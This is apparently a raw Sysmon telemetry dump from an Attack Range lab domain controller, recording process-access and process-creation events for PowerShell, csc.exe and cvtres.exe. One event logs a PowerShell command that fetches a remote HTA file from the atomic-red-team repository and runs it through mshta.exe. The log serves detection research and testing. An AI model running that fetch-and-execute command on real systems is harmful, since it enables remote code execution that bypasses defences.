16:01:21.722{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000028965Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:21.722{7901BC46-53D1-6008-9E06-00000000A301}71207988C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe{7901BC46-53D1-6008-9F06-00000000A301}5864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+b181|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+3d58|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+3ed0|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+3fa6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+274e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+27a0|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+28e4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+7e38f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+45d22|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+448ef|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+445e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+44303|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+18321|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+17b76|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+9e0d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+1edf02|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000028964Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:21.733{7901BC46-53D1-6008-9F06-00000000A301}5864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe12.00.52519.0 built by: VSWINSERVICINGMicrosoft® Resource File To COFF Object Conversion UtilityMicrosoft® .NET FrameworkMicrosoft CorporationCVTRES.EXEC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\ADMINI~1\AppData\Local\Temp\RES558F.tmp" "c:\Users\Administrator\AppData\Local\Temp\gbnoslx1\CSC56D9C03ACDA34F9FBD60E969C98F7916.TMP"C:\Users\Administrator\AppData\Local\Temp\ATTACKRANGE\Administrator{7901BC46-4A89-6008-6879-0C0000000000}0xc79682HighMD5=33BB8BE0B4F547324D93D5D2725CAC3D,SHA256=54315FD2B69C678EB7D8C145F683C15F41FA9F7B9ABF7BF978667DF4158F43C3,IMPHASH=9A65E39CA38ADDAA7D4BB704AD0223FF{7901BC46-53D1-6008-9E06-00000000A301}7120C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Administrator\AppData\Local\Temp\gbnoslx1\gbnoslx1.cmdline" 10341000x800000000000000028963Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:21.659{7901BC46-4FA9-6008-4405-00000000A301}70003220C:\Windows\system32\conhost.exe{7901BC46-53D1-6008-9E06-00000000A301}7120C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000028962Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:21.659{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000028961Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:21.659{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000028960Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:21.659{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000028959Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:21.659{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000028958Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:21.659{7901BC46-4A88-6008-F200-00000000A301}19126716C:\Windows\system32\csrss.exe{7901BC46-53D1-6008-9E06-00000000A301}7120C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000028957Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:21.659{7901BC46-53CF-6008-9B06-00000000A301}61884124C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{7901BC46-53D1-6008-9E06-00000000A301}7120C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+3332f6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+270222|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+26fe9f|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+26f9ee|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+26f97a|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+26e48b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+7c242b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+7c18d9|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P521220ea#\db79b1cc2b753cce16ad58d141a194ca\Microsoft.PowerShell.Commands.Utility.ni.dll+2fffc(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P521220ea#\db79b1cc2b753cce16ad58d141a194ca\Microsoft.PowerShell.Commands.Utility.ni.dll+2fffc(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+49628357(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+49604130(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+49603e01(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+4a0b5466(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+495c4997(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+49622e66(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+496064cb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+496064cb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+4960635c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+495f82e1(wow64) 154100x800000000000000028956Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:21.660{7901BC46-53D1-6008-9E06-00000000A301}7120C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe4.7.2053.0 built by: NET47REL1Visual C# Command Line CompilerMicrosoft® .NET FrameworkMicrosoft Corporationcsc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Administrator\AppData\Local\Temp\gbnoslx1\gbnoslx1.cmdline"C:\Users\Administrator\AppData\Local\Temp\ATTACKRANGE\Administrator{7901BC46-4A89-6008-6879-0C0000000000}0xc79682HighMD5=4360A98D8785625667D2574D2DD5C988,SHA256=F7DB25AA420C14C514690C1E943EC1E729596973E911B3445DFAD42FE958711D,IMPHASH=ED2AE001A3FDD84BDC04C99A98883A52{7901BC46-53CF-6008-9B06-00000000A301}6188C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {Invoke-ATHHTMLApplication -HTAUri https://raw.githubusercontent.com/redcanaryco/atomic-red-team/24549e3866407c3080b95b6afebf78e8acd23352/atomics/T1218.005/src/T1218.005.hta -MSHTAFilePath $env:windir\system32\mshta.exe} 11241100x800000000000000028955Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:21.644{7901BC46-53CF-6008-9B06-00000000A301}6188C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\gbnoslx1\gbnoslx1.cmdline2021-01-20 16:01:21.644 11241100x800000000000000028954Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.localDLL2021-01-20 16:01:21.644{7901BC46-53CF-6008-9B06-00000000A301}6188C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\gbnoslx1\gbnoslx1.dll2021-01-20 16:01:21.644 11241100x800000000000000028953Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.localDLL2021-01-20 16:01:21.519{7901BC46-53D1-6008-9C06-00000000A301}7908C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeC:\Users\Administrator\AppData\Local\Temp\bfo3jm2b\bfo3jm2b.dll2021-01-20 16:01:21.441 10341000x800000000000000028952Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:21.519{7901BC46-4FA9-6008-4405-00000000A301}70003220C:\Windows\system32\conhost.exe{7901BC46-53D1-6008-9D06-00000000A301}7708C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000028951Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:21.519{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000028950Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:21.519{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000028949Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:21.503{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000028948Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:21.503{7901BC46-4A88-6008-F200-00000000A301}19122148C:\Windows\system32\csrss.exe{7901BC46-53D1-6008-9D06-00000000A301}7708C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000028947Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:21.503{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000028946Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:21.503{7901BC46-53D1-6008-9C06-00000000A301}79088112C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe{7901BC46-53D1-6008-9D06-00000000A301}7708C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+b181|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+3d58|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+3ed0|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+3fa6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+274e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+27a0|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+28e4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+7e38f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+45d22|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+448ef|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+445e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+44303|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+18321|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+17b76|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+9e0d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+1edf02|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000028945Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:21.518{7901BC46-53D1-6008-9D06-00000000A301}7708C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe12.00.52519.0 built by: VSWINSERVICINGMicrosoft® Resource File To COFF Object Conversion UtilityMicrosoft® .NET FrameworkMicrosoft CorporationCVTRES.EXEC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\ADMINI~1\AppData\Local\Temp\RES54B5.tmp" "c:\Users\Administrator\AppData\Local\Temp\bfo3jm2b\CSC5661A9A494EF4C22B0F2FF677542568C.TMP"C:\Users\Administrator\AppData\Local\Temp\ATTACKRANGE\Administrator{7901BC46-4A89-6008-6879-0C0000000000}0xc79682HighMD5=33BB8BE0B4F547324D93D5D2725CAC3D,SHA256=54315FD2B69C678EB7D8C145F683C15F41FA9F7B9ABF7BF978667DF4158F43C3,IMPHASH=9A65E39CA38ADDAA7D4BB704AD0223FF{7901BC46-53D1-6008-9C06-00000000A301}7908C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Administrator\AppData\Local\Temp\bfo3jm2b\bfo3jm2b.cmdline" 10341000x800000000000000028944Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:21.456{7901BC46-4FA9-6008-4405-00000000A301}70003220C:\Windows\system32\conhost.exe{7901BC46-53D1-6008-9C06-00000000A301}7908C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000028943Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:21.456{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000028942Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:21.456{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000028941Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 